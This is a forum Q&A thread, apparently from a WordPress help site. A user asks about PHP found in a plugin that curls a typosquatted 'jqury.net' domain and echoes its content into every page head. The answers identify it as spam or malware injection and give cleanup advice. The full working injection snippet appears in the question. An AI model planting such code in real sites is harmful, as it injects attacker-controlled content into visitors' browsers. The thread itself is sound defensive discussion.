I found this in a plugin. What does it do? is it dangerous?

I found this in a plugin. What does it do? is it dangerous?

add_action('admin_enqueue_scripts', 'pw_load_scripts');
if (!function_exists('wp__head'){
function wp__head() {
    if(function_exists('curl_init')) { 
        $ch = curl_init();
        curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); 
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 
        curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']);
        curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); 
        $jquery = curl_exec($ch);  
        curl_close($ch); 
        echo "$jquery";
    }
}
add_action('wp_head', 'wp__head');
}

Related posts

2 comments

  1. It loads a block of markup containing spam (I thought about posting a bit of the source but I don’t want to advertise the content in any way) from a domain that is a close misspelling of the domain– http://jquery.com/— used by jQuery, a reputable and popular Javascript library and one that WordPress includes in the Core. I think the idea is to appear to be loading that library, when in fact loading something very different.

    And it is in other ways attempting to appear to be loading jQuery. Notice the variable name $jquery.

    It may attempt to load malicious scripts as well. I didn’t check.
    I would definitely call it dangerous especially since the content on that page can change anytime the domain controllers feel like it.

    At best it is going to damage your site as search engines look down on sites that spread spam.

    Don’t use it. It does nothing beneficial for you or for anyone else on the web other than the people who run the site. If you found this on a reputable site, report it to them.

  2. Yes, it is dangerous code, loading content from a spam site.

    You didn’t name the plugin, but if you found this code after it has been installed on your website, it is possible that the plugin code didn’t come from the developer like this, but instead was hacked after it was installed. If this is the case, you might find the malicious code on more of your website than just this plugin.

    Check the downloaded plugin code from wherever you got the plugin originally, and see if this malicious code was there originally. If not, then your site has been hacked. If you determine that to be the case, read this article from the Codex.

Comments are closed.